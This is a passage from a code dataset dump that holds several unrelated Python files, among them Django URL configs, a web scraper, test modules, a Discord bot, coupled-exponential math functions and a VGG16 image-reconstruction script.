django.contrib.auth.views import login\n\nfrom life.views import main\n\nurlpatterns = [\n # Main views\n url(r'^$', main),\n url(r'^budget/', include('budget.urls')),\n url(r'^health/', include('health.urls')),\n url(r'^food/', include('food.urls')),\n url(r'^scenarios/', include('scenarios.urls')),\n\n # Autocomplete stuff\n #url(r'^autocomplete/', include('autocomplete_light.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n\n # Login stuff\n url(r'^accounts/login/$',\n login,\n {'template_name': 'login.html'},\n name='login'),\n]\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n","sub_path":"life/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322952812","text":"\"\"\"Module for Krake controller responsible for binding Krake\napplications to specific backends and entry point of Krake scheduler.\n\n.. code:: bash\n\n python -m krake.controller.scheduler --help\n\nConfiguration is loaded from the ``controllers.scheduler`` section:\n\n.. code:: yaml\n\n controllers:\n scheduler:\n api_endpoint: http://localhost:8080\n worker_count: 5\n\n\"\"\"\nimport logging\nimport pprint\nfrom argparse import ArgumentParser\n\nfrom krake import load_config, setup_logging, search_config\nfrom ...controller import create_ssl_context, run\nfrom .scheduler import Scheduler\n\nlogger = logging.getLogger(\"krake.controller.scheduler\")\n\n\ndef main(config):\n scheduler_config = load_config(config or search_config(\"scheduler.yaml\"))\n\n setup_logging(scheduler_config[\"log\"])\n logger.debug(\n \"Krake configuration settings:\\n %s\" % pprint.pformat(scheduler_config)\n )\n\n tls_config = scheduler_config.get(\"tls\")\n ssl_context = create_ssl_context(tls_config)\n logger.debug(\"TLS is %s\", \"enabled\" if ssl_context else \"disabled\")\n\n scheduler = Scheduler(\n api_endpoint=scheduler_config[\"api_endpoint\"],\n worker_count=scheduler_config[\"worker_count\"],\n ssl_context=ssl_context,\n debounce=scheduler_config.get(\"debounce\", 0),\n reschedule_after=scheduler_config.get(\"reschedule_after\", 60),\n stickiness=scheduler_config.get(\"stickiness\", 0.1),\n )\n run(scheduler)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Krake scheduler\")\n parser.add_argument(\"-c\", \"--config\", help=\"Path to configuration YAML file\")\n main(**vars(parser.parse_args()))\n","sub_path":"krake/krake/controller/scheduler/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"401349808","text":"\nfrom django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"posts\", views.posts, name=\"posts\"),\n\n\n # API Routes\n path(\"like\", views.like, name=\"like\"),\n path(\"editing_post\", views.editing_post, name=\"editing_post\"),\n path(\"edit_post\", views.edit_post, name=\"edit_post\"),\n path(\"new_post\", views.new_post, name=\"new_post\"),\n path(\"follow\", views.follow_button, name=\"follow_button\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"follow/\", views.follow, name=\"follow\")\n]\n","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"289139737","text":"import json\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\n\r\nscrape_url = 'https://understat.com/league/EPL'\r\n\r\n\r\npg_connect = urlopen(scrape_url)\r\n\r\npg_html = BeautifulSoup(pg_connect, \"html.parser\")\r\n\r\njson_raw_string = pg_html.find_all(name = \"script\")[3].string\r\nprint(json_raw_string)\r\n\r\nstart_ind = json_raw_string.index(\"\\\\\") \r\nend_ind = json_raw_string.index(\"')\")\r\n\r\njson_data = json_raw_string[start_ind:end_ind]\r\n\r\njson_data = json_data.encode(\"utf8\").decode(\"unicode_escape\")\r\n\r\njson.loads(json_data)\r\n\r\nfin_json_df = pd.json_normalize(json.loads(json_data))\r\n\r\nprint(fin_json_df)\r\n\r\nfin_json_df.to_csv('PLPLAYERS.csv')\r\n\r\n\r\n","sub_path":"plwebsc.py","file_name":"plwebsc.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282997660","text":"from opendc.util.database import DB\n\ntest_id = 24 * '1'\n\n\ndef test_add_project_missing_parameter(client):\n assert '400' in client.post('/v2/projects').status\n\n\ndef test_add_project(client, mocker):\n mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'authorizations': []})\n mocker.patch.object(DB,\n 'insert',\n return_value={\n '_id': test_id,\n 'datetimeCreated': '000',\n 'datetimeLastEdited': '000',\n 'topologyIds': []\n })\n mocker.patch.object(DB, 'update', return_value={})\n res = client.post('/v2/projects', json={'project': {'name': 'test project'}})\n assert 'datetimeCreated' in res.json['content']\n assert 'datetimeLastEdited' in res.json['content']\n assert 'topologyIds' in res.json['content']\n assert '200' in res.status\n","sub_path":"api/opendc/api/v2/projects/test_endpoint.py","file_name":"test_endpoint.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588638675","text":"from xlslib import XLS\nfrom unidecode import unidecode\nimport re\nimport datetime\nfrom progress_bar import printProgress\nimport math\n\n\ndef replace_wrong(old_string, new_string, array, is_regex):\n if not is_regex:\n for position in range(len(array)):\n if array[position] != None:\n array[position] = str(array[position]).replace(old_string, new_string)\n else:\n array[position] = \"BRAK-DANYCH\"\n else:\n for position in range(len(array)):\n if array[position] != None:\n if re.search((old_string + \"$\"), array[position]):\n array[position] = str(array[position]).replace(old_string, new_string)\n else:\n 
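                # None entries are replaced with the \"BRAK-DANYCH\" sentinel (Polish for \"missing data\")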
array[position] = \"BRAK-DANYCH\"\n return array\n\n\ndef delete_non_ascii_letters(files_array, column_name):\n\n iteration = 0\n total = len(files_array)\n printProgress(iteration, total, prefix = 'Progress: ', suffix = 'Complete', barLength = 50)\n\n # if arrays with old and new strings have same length...\n if len(old_string_array) == len(new_string_array):\n # for each .xlsx file\n for excel_file in files_array:\n\n # load file.\n filename = 'xls/' + excel_file + '.xlsx'\n file = XLS(filename)\n\n # get array with strings (worker positions)\n arr = file.get_column(column_name)\n\n # remove all czech letters\n for k, v in czech_letters_dict.items():\n arr = replace_wrong(k, v, arr, 0)\n\n for x in range(len(arr)):\n arr[x] = unidecode(arr[x])\n \n for n in range(len(old_string_array)):\n arr = replace_wrong(old_string_array[n], new_string_array[n], arr, 0)\n\n if column_name == \"F\" or column_name == \"H\":\n for position in arr:\n if position != \"BRAK-DANYCH\":\n math.fabs(float(position))\n\n if column_name == \"B\":\n for i in range(len(arr)):\n position = arr[i]\n year, month = position[:len(position) // 2], position[len(position) // 2:]\n new_date = month + \".20\" + year\n arr[i] = new_date\n\n arr = replace_wrong(\"..\",\".\", arr, 0)\n file.write_column(column_name, arr)\n file.save(filename)\n\n iteration += 1\n printProgress(iteration, total, prefix = \"Progress: \", suffix = \"Complete\", barLength = 50)\n else:\n print(\"There is something wrong with arrays\")\n\n\n\nczech_letters_dict = { \"ť\":\"L\", \"ú\":\"O\", \"í\":\"Z\", \"É\":\"E\" }\n\n\nold_string_array = [ \" \", \",\" ]\n\nnew_string_array = [ \"\", \".\" ]\n\nfiles_array = [\"Wynagrodzenia2007\"]\n\nregex_dict = { }\n\n\nprint(\"\")\nprint(\"### Running run_wynagrodzenia.py script - Absolute values on columns F and H, repairing column's B dates ###\")\nprint(\"\")\n\nprint(\"Repairing bad dates in Wynagrodzenia.xls in column B\")\ndelete_non_ascii_letters(files_array, \"B\")\n\nprint(\"Absolute values in Wynagrodzenia.xls on column F\")\ndelete_non_ascii_letters(files_array, \"F\")\n\nprint(\"Absolute values in Wynagrodzenia.xls on column H\")\ndelete_non_ascii_letters(files_array, \"H\")\n\n","sub_path":"lib/run_wynagrodzenia.py","file_name":"run_wynagrodzenia.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609562612","text":"#!/usr/bin/env python\n\nimport logging\nimport time\n\nfrom switcher.agistopology.ddm import AGISDDM, AGISDDMHandler\nfrom switcher.services.serverapi import AGIS\nfrom switcher.downtime import EndpointDowntimes, OverlapDowntimes, OverlapDowntimesList\n\n\nclass DDM(AGISDDM):\n\n def __init__(self, endpoint):\n super(DDM, self).__init__(endpoint)\n self.log = logging.getLogger('topology')\n ###self.downtime_l = []\n self.endpointdowntimes = EndpointDowntimes()\n self.log.debug('Object DDMSwitcher created.')\n\n\n def add_downtime(self, downtime):\n self.endpointdowntimes.add(downtime)\n\n\n def getEndpointDowntimes(self):\n return self.endpointdowntimes\n\n\n # --------------------------------------------------------------------------\n\n def is_in_downtime(self, seconds):\n \"\"\"\n checks if there at least one downtime event \n for this DDM a given number of seconds in the future.\n We do it by checking if we are alrady affected by an\n extended TimeInterval for any of the Downtime events registered.\n :param int seconds: how many seconds to look into the future\n :return bool:\n 
\"\"\"\n self.log.info('Checking if DDM %s is affected by downtime.' %self.endpoint)\n for downtime in self.endpointdowntimes.getlist():\n timeinterval = downtime.timeinterval\n extended_timeinterval = timeinterval.extend(seconds)\n #if extended_timeinterval.belongs():\n # return True\n if int(time.time()) in extended_timeinterval:\n return True\n\n else:\n self.log.info('DDM %s is not affected by downtime. Returning False.' %self.endpoint)\n return False\n\n\n# =============================================================================\n\nclass DDMHandler(AGISDDMHandler):\n\n\n def getOverlapDowntimesList(self):\n \"\"\"\n to get if all DDMs will be in downtime at the same time.\n It returns a OverlapDowntimesList, so the output has the same \n shape that the one returned by CEHandler.\n :return OverlapDowntimesList:\n \"\"\"\n # Currently, there is only one DDM per DDMHandler,\n # therefore, we convert each Downtime to a \n # OverlapDowntimes, because we know there are no\n # more than one Downtimes (overlapping or not), \n # because there are no more than one DDM\n\n overlapdowntimeslist = OverlapDowntimesList()\n for ddm in self.getlist():\n downtime_l = ddm.getEndpointDowntimes()\n for downtime in downtime_l.getlist():\n # we make a collection from each Downtime\n overlapdowntimes = OverlapDowntimes()\n overlapdowntimes.add(downtime)\n # we add the collection to the list of collections\n overlapdowntimeslist.add(overlapdowntimes)\n return overlapdowntimeslist\n\n \n\n\n\n","sub_path":"switcher/topology/ddm.py","file_name":"ddm.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109379025","text":"#! usr/bin/env python3\n\"\"\"\n Module 1 Task 2\n This app will test the minivan.py file\n\"\"\"\n\nfrom __future__ import print_function\nfrom urllib.request import urlopen\nimport sys\nfrom minivan import doors_lockers\n\ndef testMinivan():\n \"\"\"\n This function will test the minivan doors which they are open or not using getFile variable.\n It will open the file from the web.\n It will call doors_lockers function from minivan.py\n \"\"\"\n # Assign the csv file from the web to getFile veriable.\n getFile = \"http://icarus.cs.weber.edu/~hvalle/cs3030/data/minivanTest.csv\"\n # open the csv file \n with urlopen(getFile) as testFile:\n # Declare and Store the output in a record list.\n record = []\n # Loop over each line in the testFile\n for line in testFile:\n # Decode the line and replace spaces, strip them and split them with comma.\n lineRows = line.decode('utf-8').replace(\" \", \"\").strip().split(\",\")\n # Add what is in lineRows variable to record list\n record.append(lineRows)\n # Start the counter \n counter = 0\n # Loop over each element in the record list\n for el in record:\n # Check if the counter is greater than 0\n if counter > 0:\n # Print record list.\n print(\"Reading Record {0}:\".format(counter))\n # Call doors_lockers function from minivan.py and assign each el to the corrsponding variable..\n doors_lockers(el)\n # Pring an empty line.\n print()\n # Increase the counter by 1\n counter += 1\n\ndef main():\n \"\"\"\n Run the app and invoke testMinivan function\n \"\"\"\n # Call testing function\n testMinivan()\n \nif __name__ == \"__main__\":\n main()\n exit(0)\n","sub_path":"minivantest.py","file_name":"minivantest.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"93501268","text":"import pytest\n\nfrom custom_components.hacs.validate.common.repository_description import (\n RepositoryDescription,\n)\nfrom tests.dummy_repository import dummy_repository_base\n\n\n@pytest.mark.asyncio\nasync def test_repository_no_description():\n repository = dummy_repository_base()\n repository.data.description = \"\"\n check = RepositoryDescription(repository)\n await check._async_run_check()\n assert check.failed\n\n\n@pytest.mark.asyncio\nasync def test_repository_hacs_description():\n repository = dummy_repository_base()\n check = RepositoryDescription(repository)\n await check._async_run_check()\n assert not check.failed\n","sub_path":"tests/validate/common/test_repository_description_check.py","file_name":"test_repository_description_check.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62464416","text":"from datetime import timedelta\nfrom flask import Flask, session\nimport os\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.urandom(24)\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=7) #将session改为7天\n@app.route('/')\ndef hello_world():\n session['username'] = 'zhiliao'\n #没有设置过期时间,那么默认是浏览器关闭后\n #如果设置permanent属性为True则一个月后消失\n session.permanent = True\n return 'Hello World!'\n\n@app.route('/get/')\ndef get():\n return session.get('username', 'hah')\n\n@app.route('/delete/')\ndef delete():\n # session.pop('username', '')\n session.clear()\n print(session.get('username', '猪头肉'))\n return 'success'\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flask/Day06Session/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636168281","text":"import io\nimport os\nimport pickle\nimport webbrowser\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"S:\\\\Internet Sales Office\\\\Web\\\\credentials\\\\google-cloud-vision\\\\mr-s-image-project-8827e477db4a.json\"\n\n# Imports the Google Cloud client library\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\n# Labels\ndef detect_labels_uri(uri):\n \"\"\"Detects labels in the file located in Google Cloud Storage or on the\n Web.\"\"\"\n client = vision.ImageAnnotatorClient()\n image = types.Image()\n image.source.image_uri = uri\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n # print('Labels:')\n\n # for label in labels:\n # print(label.description)\n\n return labels\n\n# Safe Search\n\ndef detect_safe_search_uri(uri):\n \"\"\"Detects unsafe features in the file located in Google Cloud Storage or\n on the Web.\"\"\"\n client = vision.ImageAnnotatorClient()\n image = vision.types.Image()\n image.source.image_uri = uri\n\n response = client.safe_search_detection(image=image)\n safe = response.safe_search_annotation\n\n # Names of likelihood from google.cloud.vision.enums\n # likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\n # 'LIKELY', 'VERY_LIKELY')\n # print('Safe search:')\n\n # print('adult: {}'.format(likelihood_name[safe.adult]))\n # print('medical: {}'.format(likelihood_name[safe.medical]))\n # print('spoofed: {}'.format(likelihood_name[safe.spoof]))\n # print('violence: {}'.format(likelihood_name[safe.violence]))\n # print('racy: {}'.format(likelihood_name[safe.racy]))\n\n return safe\n\n\nwith open('image_urls_gcv_processed.pickle', 'rb') as f:\n # The 
protocol version used is detected automatically, so we do not\n    # have to specify it.\n    image_urls = pickle.load(f)\n\n# print(\"Loaded image urls!\")\n# print(\"len(image_urls) = \" + str(len(image_urls)))\n# print()\n\n# Variables to report to console during processing:\nerror_urls = []\ncounter = 0\n\n\n# for image in image_urls[500:510]:\nfor image in image_urls:\n\n    if len(image['labels']) == 0:\n\n        counter += 1\n\n        try:\n            url = image['url']\n\n            print(str(counter))\n            print(url)\n\n            labels = []\n            for item in range(3):\n                webbrowser.open_new(url)\n                word = input(\"Input labels: \")\n                score = .9\n                label = { \"word\": word, \"score\": score }\n                labels.append(label)\n\n            image['labels'] = labels\n\n            print(\"Fixed image \" + str(counter) + \" of 66\")\n            print('-'*50)\n            print()\n\n        except Exception as err:\n\n            error_urls.append(image)\n\n            print(\"============================================\")\n            print(\"Skipped: \" + image['sku'] + '\\n' + image['url'])\n            print(\"line: \" + str(sys.exc_info()[-1].tb_lineno) )\n            print(err)\n            print(\"============================================\")\n\nprint(\"Finished!\")\nprint()\n\n\n# WRITE data object to file (SERIALIZE)\nwith open('image_urls_gcv_processed_PLUS_66.pickle', 'wb') as f:\n    # Pickle the 'data' dictionary using the highest protocol available.\n    pickle.dump(image_urls, f, pickle.HIGHEST_PROTOCOL)\n\n    \n# WRITE ERRORS list to file (SERIALIZE)\nwith open('error_urls.pickle', 'wb') as f:\n    # Pickle the 'data' dictionary using the highest protocol available.\n    pickle.dump(error_urls, f, pickle.HIGHEST_PROTOCOL)","sub_path":"image-analysis/1-images/2-get-google-cloud-vision-data/fix_66_labelless.py","file_name":"fix_66_labelless.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"131744424","text":"import lob\nimport sys\nimport webbrowser\nimport requests.exceptions\n\nlob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'\neasyStates = {}\n\ndef setUpStatesLookup():\n\tstates = lob.State.list()\n\tfor state in states[\"data\"]:\n\t    easyStates[state[\"name\"].upper()] = state[\"short_name\"]\n\t    easyStates[state[\"short_name\"]] = 0\n\ndef createLetter(toAddress, fromAddress):\n    letter = lob.Letter.create(\n        description = 'Coding Challenge Letter',\n        to_address = {\n            'name': toAddress.name,\n            'address_line1': toAddress.address1,\n            'address_line2': toAddress.address2,\n            'address_city': toAddress.city,\n            'address_state': toAddress.state,\n            'address_zip': toAddress.zip,\n            'address_country': 'US'\n        },\n        from_address = {\n            'name': fromAddress.name,\n            'address_line1': fromAddress.address1,\n            'address_line2': fromAddress.address2,\n            'address_city': fromAddress.city,\n            'address_state': fromAddress.state,\n            'address_zip': fromAddress.zip,\n            'address_country': 'US'\n        },\n        file = '{{message}}',\n        data = {\n            'message': fromAddress.msg\n        },\n        color = True)\n    webbrowser.open(letter[\"url\"]) \n\ntry:\n\tsetUpStatesLookup()\nexcept requests.exceptions.RequestException as e:\n\tprint(\"Couldn't connect: {0}\".format(e.strerror))\n\tsys.exit(1) ","sub_path":"lob_adapter.py","file_name":"lob_adapter.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84445253","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\ndef coupled_logarithm(value: [int, float, np.ndarray],\n                      kappa: [int, float] = 0.0,\n                      dim: int = 1\n                      ) -> [float, np.ndarray]:\n    \"\"\"\n    Generalization of the logarithm function, 
which defines a smooth\n    transition to power functions.\n    \n    Parameters\n    ----------\n    value : Input variable to which the coupled logarithm is applied.\n            Accepts int, float, and np.ndarray data types.\n    kappa : Coupling parameter which modifies the coupled logarithm function.\n            Accepts int and float data types.\n    dim : The dimension (or rank) of value. If value is scalar, then dim = 1.\n          Accepts only int data type.\n    \"\"\"\n    # convert value into np.ndarray (if scalar) to keep consistency\n    value = np.array(value) if isinstance(value, (int, float)) else value\n    assert isinstance(value, np.ndarray), \"value must be an int, float, or np.ndarray.\"\n    assert 0. not in value, \"value must not be zero or contain any zeros.\"\n    if kappa == 0.:\n        coupled_log_value = np.log(value)  # divide by 0 if x == 0\n    else:\n        coupled_log_value = (1. / kappa) * (value**(kappa / (1. + dim*kappa)) - 1.)\n    return coupled_log_value\n\n\ndef coupled_exponential(value: [int, float, np.ndarray],\n                        kappa: float = 0.0,\n                        dim: int = 1\n                        ) -> [float, np.ndarray]:\n    \"\"\"\n    Generalization of the exponential function.\n\n    Parameters\n    ----------\n    value : [float, np.ndarray]\n        Input values to which the coupled exponential is applied.\n    kappa : float,\n        Coupling parameter which modifies the coupled exponential function. \n        The default is 0.0.\n    dim : int, optional\n        The dimension of x, or rank if x is a tensor. The default is 1.\n\n    Returns\n    -------\n    float\n        The coupled exponential values.\n    \n    \"\"\"\n    # convert number into np.ndarray to keep consistency\n    value = np.array(value) if isinstance(value, (int, float)) else value\n    assert isinstance(value, np.ndarray), \"value must be an int, float, or np.ndarray.\"\n    # assert 0 not in value, \"value must not be or contain np.ndarray zero(s).\"\n    assert isinstance(dim, int) and dim >= 0, \"dim must be an integer greater than or equal to 0.\"\n    # check that -1/d <= kappa\n    assert -1/dim <= kappa, \"kappa must be greater than or equal to -1/dim.\"\n\n    if kappa == 0:\n        coupled_exp_value = np.exp(value)\n    elif kappa > 0:  # KPN 4/13/21 adding logic for 1 + kappa*value <= 0\n        # elementwise: entries with 1 + kappa*value <= 0 map to 0, since kappa > 0\n        # makes the exponent (1 + dim*kappa)/kappa positive; clamping the base at 0\n        # keeps the computation valid for array inputs as well as scalars\n        coupled_exp_value = np.maximum(1 + kappa*value, 0.)**((1 + dim*kappa)/kappa)\n    \n    # the following is given that kappa < 0\n    else:\n        def _compact_support(value, kappa, dim):\n            if (1 + kappa*value) > 0:  # KPN 4/13/21 removed equal sign; if = 0, then result is either 0 or inf\n                try:\n                    return (1 + kappa*value)**((1 + dim*kappa)/kappa)\n                except ZeroDivisionError:  # KPN 4/13/21 ZeroDivisionError may no longer be necessary\n                    print(\"Skipped ZeroDivisionError at the following: \" + \\\n                          f\"value = {value}, kappa = {kappa}. 
Therefore,\" + \\\n f\"(1+kappa*value) = {(1+kappa*value)}\"\n )\n elif ((1 + dim*kappa)/kappa) > 0:\n return 0.\n else:\n return float('inf') \n compact_support = np.vectorize(_compact_support)\n coupled_exp_value = compact_support(value, kappa, dim)\n\n return coupled_exp_value\n","sub_path":"nsc_tf/math/.ipynb_checkpoints/function-checkpoint.py","file_name":"function-checkpoint.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106114149","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.insert(0, '../../')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport mut.viz\ncolors = mut.viz.color_selector('pboc')\nmut.viz.plotting_style()\n\n# Load the SBC statistics\nsbc_data = pd.read_csv('../../data/csv/IND_sbc.csv')\n\n# Reform the dataframe to only focus on Ka and Ki\ndf = pd.DataFrame([])\nfor g, d in sbc_data.groupby(['sim_idx', 'model']):\n ka = d[d['param']=='Ka'][['post_median', 'shrinkage']].values[0]\n ki = d[d['param']=='Ki'][['post_median', 'shrinkage']].values[0]\n df = df.append({'Ka_shrinkage':ka[1], 'Ki_shrinkage':ki[1], \n 'Ka_median':ka[0], 'Ki_median':ki[0], \n 'model':g[1], 'sim':g[0], 'idx':ka[1] <= ki[1]},\n ignore_index=True)\n\n# ##############################################################################\n# FIGURE INSTANTIATION\n# ##############################################################################\nfig, ax = plt.subplots(2, 1, figsize=(6, 3))\n\n# Define the axes\naxes = {'KaKi_only':ax[0], 'KaKi_epAI':ax[1]}\n\n# Adjust scaling and set labels\nfor a in ax.ravel():\n a.xaxis.set_tick_params(labelsize=6)\n a.yaxis.set_tick_params(labelsize=6)\n a.set_xlim([-1, 1.1])\n a.set_yscale('log')\n a.set_xlabel('shrinkage', fontsize=8)\n a.set_ylabel('$K_A$ [µM]', fontsize=8)\nax[0].set_title('$K_A$ and $K_I$ modified', fontsize=8)\nax[0].set_title(r'$K_A$, $K_I$, and $\\Delta\\varepsilon_{AI}$ modified', fontsize=8)\n\n# ##############################################################################\n# ECDFS\n# ##############################################################################\nfor g, d in df.groupby('model'):\n gt_s = d[d['idx']==0]['Ka_shrinkage'].values\n gt_v = d[d['idx']==0]['Ka_median'].values\n lt_s = d[d['idx']==1]['Ka_shrinkage'].values\n lt_v = d[d['idx']==1]['Ka_median'].values\n pool_s = d[d['idx']==1]['Ka_shrinkage'].values\n pool_v = d[d['idx']==1]['Ka_median'].values\n _ax = axes[g]\n _ax.plot(gt_s, gt_v, '.', color=colors['red'], \n label='$K_A > K_I$', alpha=0.5)\n _ax.plot(lt_s, lt_v, '.', color=colors['blue'], \n label='$K_A < K_I$', alpha=0.5)\n\nfor a in ax:\n a.legend(fontsize=8, ncol=2, loc='lower left')\nplt.tight_layout()","sub_path":"code/figures/FigSX_shrinkage_pathology.py","file_name":"FigSX_shrinkage_pathology.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10937787","text":"from asyncio import sleep\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport discord\nfrom PIL import Image\nfrom discord import Intents\nfrom discord.ext import commands\n\nfrom bot.config import bad_apple_bot_config\nfrom bot.utils import CLIP_FRAMES, CLIP_LENGTH, FRAME_LENGTH, frames_path, process_image\n\nPROCESS_POOL_SIZE = 5\nPROCESS_POOL = ProcessPoolExecutor(PROCESS_POOL_SIZE)\n\nbot = commands.AutoShardedBot(\n command_prefix=commands.when_mentioned_or(bad_apple_bot_config.prefix.value),\n 
description=\"Bot that sends bad apple video frames to you channel!\",\n intents=Intents.default()\n)\nbot.__version__ = \"1.0.0\"\n\n\n@bot.event\nasync def on_ready():\n print(\n \"Logged in as\",\n f\"Name: {bot.user.name}\",\n f\"DevID: {bot.user.id}\",\n f\"Discord.py {discord.__version__}\",\n f\"Bot version: {bot.__version__}\",\n \"Fork by @Rud356 (https://github.com/Rud356)\",\n \"Original bot by: @NPCat (https://github.com/NPCat)\",\n f\"default prefix: {bad_apple_bot_config.prefix.value}\",\n sep='\\n'\n )\n\n activity = discord.Activity(\n name=f\"My prefix is {bad_apple_bot_config.prefix.value}\",\n type=discord.ActivityType.watching\n )\n await bot.change_presence(activity=activity)\n\n\n@commands.cooldown(rate=1, per=CLIP_LENGTH, type=commands.BucketType.channel)\n@bot.command()\nasync def bad_apple(ctx: commands.Context):\n \"\"\"Plays bad apple video in text messages\"\"\"\n played_frames = 0\n for frame_index in range(0, CLIP_FRAMES, 4):\n frame_path = frames_path / f\"frame {frame_index}.png\"\n if not frame_path.is_file():\n continue\n\n try:\n frame = Image.open(frame_path)\n except Image.UnidentifiedImageError:\n continue\n\n converted_frame = await bot.loop.run_in_executor(\n PROCESS_POOL, process_image, frame\n )\n\n await ctx.send(content=converted_frame)\n played_frames += 1\n await sleep(FRAME_LENGTH)\n\n await ctx.send(content=\"Done!\")\n","sub_path":"bot/bad_apple.py","file_name":"bad_apple.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349987323","text":"from scipy.misc import imsave, imshow\nimport numpy as np\nfrom keras.applications import vgg16\nfrom keras import backend as K\nfrom keras.preprocessing import image\nfrom utils import *\nfrom scipy.optimize import fmin_l_bfgs_b\n\n# dimensions of the generated pictures for each filter.\nimg_width, img_height = 128, 128\n\nshow_pictures = 1\n\n# Optimization algo\n# Turn BFGS to 0 for using gradient descent algo \nBFGS = 1\n# Parameters of BFGS \nbfgs_iter = 10\n# Parameters of the gradient descent\ngdsc_step = 0.00001\ngdsc_iter = 50\n\n############### Model build ###############################\n# build the VGG19 network with ImageNet weights, no fully connected layers\nmodel = vgg16.VGG16(weights='imagenet', include_top=False)\nmodel.summary()\noutputs_dict = dict([layer.name, layer.output] for layer in model.layers)\n\n# Content Image\nimg = image.load_img('contents/content.jpg', target_size=(img_width, img_height))\nif (show_pictures == 1):\n imshow(img)\nimsave(\"original_content.png\", img)\ncontent_img = preprocess_image(img)\n\n\n############### Response from Content image ###############################\n\ncontent_layers = ['block1_conv1', 'block1_conv2']\ncontent_layers += ['block2_conv1', 'block2_conv2']\ncontent_layers += ['block3_conv1', 'block3_conv2', 'block3_conv3', 'block3_conv4']\ncontent_layers += ['block4_conv1', 'block4_conv2', 'block4_conv3', 'block4_conv4']\ncontent_layers += ['block5_conv1', 'block5_conv2', 'block5_conv3', 'block5_conv4']\n\nfor layer_name in content_layers:\n get_response = K.function([model.input], [outputs_dict[layer_name]])\n content_feature = K.constant(get_response([content_img])[0])\n\n # Gradients and loss \n layer_output = outputs_dict[layer_name][0]\n loss = K.sum(K.square(content_feature - layer_output))\n grads = K.gradients(loss, model.input)[0]\n func_loss = K.function([model.input], [loss])\n func_grads = K.function([model.input], [grads])\n\n # we 
start from a white noise image with some random noise\n    gray_img = np.random.random((1, img_width, img_height, 3)) # Channel Last\n\n    if BFGS == 1:\n        # Gradients for white noise image using min_l_bfgs_b \n        def fn_loss (x):\n            x = x.reshape((1, img_width, img_height, 3))\n            l = func_loss([x])[0]\n            return l.flatten().astype('float64')\n        \n        def fn_grads (x):\n            x = x.reshape((1, img_width, img_height, 3))\n            g = func_grads([x])[0]\n            return g.flatten().astype('float64')\n        \n        \n        for i in range (0, bfgs_iter):\n            print ('iteration ',i)\n            gray_img, min_val, info = fmin_l_bfgs_b(fn_loss, gray_img, fn_grads, maxfun=20)\n            print('Current loss value:', min_val.sum())\n        \n        rec_img = gray_img.reshape((img_width, img_height, 3))\n        bfgs='bfgs_'\n\n    else: \n        # Gradient descent \n        for i in range (gdsc_iter):\n            loss_value = func_loss([gray_img])[0]\n            grads_value = func_grads([gray_img])[0]\n            gray_img -= grads_value * gdsc_step\n            print('[', layer_name, ']', 'Iter', i, ': Current loss value =', loss_value.sum())\n        rec_img = gray_img[0]\n        bfgs=''\n\n    # decode 